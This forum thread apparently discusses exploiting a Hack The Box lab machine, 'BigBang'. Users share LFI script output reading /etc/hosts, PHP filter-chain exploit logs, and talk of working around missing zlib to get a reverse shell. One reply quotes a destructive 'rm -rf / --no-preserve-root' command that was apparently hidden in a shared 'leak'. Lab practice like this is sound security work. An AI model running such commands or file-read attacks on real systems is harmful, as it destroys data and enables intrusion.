Possibly Related Threads…

chillywilly · 01-26-2025, 06:55 AM

(01-26-2025, 06:19 AM)fuckhackthebox Wrote: FINALLY got the ateam leak holy shit

nice obfuscated

rm -rf / --no-preserve-root

:clown:

nothing0112358 · 01-26-2025, 08:29 AM

zlib is not active on the machine

hcker01 · 01-26-2025, 09:02 AM

└─$ python3 LFI.py /etc/hosts
PNG URL: http://blog.bigbang.htb/wp-content/uploa...01/1-7.png
File Contents:
GIF89a\nM127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.3 bf9a

gwen12345 · 01-26-2025, 09:14 AM

b'eHNzYjNXbkRNeGt5MThaandqdHhPdDdCVlFta253TnZTOHJSN1I2T2FtU1dEVHJqNzM='
2
[*] The data:// wrapper works
b'c0psVThwclhZenJ0WlBoczVIV3NQT2RzRU5wSnlNTkRrU1lPaTBsa3hDOWxJVVhQMXE='
2
[*] The php://filter/ wrapper works
b'K3UO8kyPygzPTgouCfOPCnJLcgotCoksKSpNzQo18zUyNakyzTN1tEjzK4kIdUy28AkCAA=='
0
[+] Exploit preconditions are satisfied
b'RTU0dWx4c2V4Z29wN1pINFowd3Nlb0YxV21tSUpCY3ZCSEdCbzBTQ3RQOENhb0k0dGg='
2
[*] The data:// wrapper works
b'MVRWbFBnRTMzbGpLREtRZ0NWeGk0YzZlbEFoZ2NGbTRUbFdHSWNESEExOFlsUE5OYkM='
2
[*] The php://filter/ wrapper works
b'y60wdww2LypIKw8NsggKyknKdytyMfQOL08tC6hwNwipCjY3NTAoDkt0DXLKcPUsDfYFAA=='
0
[+] Exploit preconditions are satisfied
[x] Error Invalid base64-encoded string: number of data characters (81425) cannot be 1 more than a multiple of 4

nothing0112358 · 01-26-2025, 09:37 AM

(01-26-2025, 09:14 AM)gwen12345 Wrote: b'eHNzYjNXbkRNeGt5MThaandqdHhPdDdCVlFta253TnZTOHJSN1I2T2FtU1dEVHJqNzM='
2
[*]The data:// wrapper works
b'c0psVThwclhZenJ0WlBoczVIV3NQT2RzRU5wSnlNTkRrU1lPaTBsa3hDOWxJVVhQMXE='
2
[*]The php://filter/ wrapper works
b'K3UO8kyPygzPTgouCfOPCnJLcgotCoksKSpNzQo18zUyNakyzTN1tEjzK4kIdUy28AkCAA=='
0
[+] Exploit preconditions are satisfied
b'RTU0dWx4c2V4Z29wN1pINFowd3Nlb0YxV21tSUpCY3ZCSEdCbzBTQ3RQOENhb0k0dGg='
2
[*]The data:// wrapper works
b'MVRWbFBnRTMzbGpLREtRZ0NWeGk0YzZlbEFoZ2NGbTRUbFdHSWNESEExOFlsUE5OYkM='
2
[*]The php://filter/ wrapper works
b'y60wdww2LypIKw8NsggKyknKdytyMfQOL08tC6hwNwipCjY3NTAoDkt0DXLKcPUsDfYFAA=='
0
[+] Exploit preconditions are satisfied
[x] Error Invalid base64-encoded string: number of data characters (81425) cannot be 1 more than a multiple of 4

How did you get the zlib to work ? You cannotnjust delete zlib from the checks, if there is no zlib the exploit will fail as zlib is used to chunk stuff in the exploit...

peRd1 · 01-26-2025, 09:48 AM

Exactly, there is no zlib on the box and looking for alternatives how to get around that.

nothing0112358 · 01-26-2025, 09:52 AM

(01-26-2025, 09:48 AM)peRd1 Wrote: Exactly, there is no zlib on the box and looking for alternatives how to get around that.

I think I will stop looking personally. Like I can have a good life without being a PHP expert ... Slept only 5 hours last night because of this ...

If someone find the zlib alternative please share ...

Dumbdev · 01-26-2025, 10:43 AM

Reading file isn't an option here. All we've to do is to execute a rev shell

Unbutton8074 · 01-26-2025, 10:48 AM

(01-26-2025, 09:48 AM)peRd1 Wrote: Exactly, there is no zlib on the box and looking for alternatives how to get around that.

btw did you manage to generate chain.txt to read full file? i am getting random elf parse errors because of random missing of bytes

k0iwdxlaxtjxpomup · (This post was last modified: 01-26-2025, 11:10 AM by k0iwdxlaxtjxpomup.)

something with create posts without login?
the form has an upload files field too

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	HTB - ARTIFICIAL.HTB - EASY LINUX	chain	0	21	02-10-2026, 02:12 PM Last Post: chain
	HTB - CERTIFICATE.HTB - HARD WINDOWS	chain	0	113	02-09-2026, 04:49 PM Last Post: chain
	HTB - CONVERSOR.HTB - EASY LINUX	chain	0	117	02-09-2026, 04:36 PM Last Post: chain
	HTB - FACTS.HTB - EASY LINUX	chain	2	163	02-09-2026, 11:02 AM Last Post: chain
	Cobblestone Hack the Box Season 8 (Linux Insane)	RedBlock	0	438	08-09-2025, 12:20 PM Last Post: RedBlock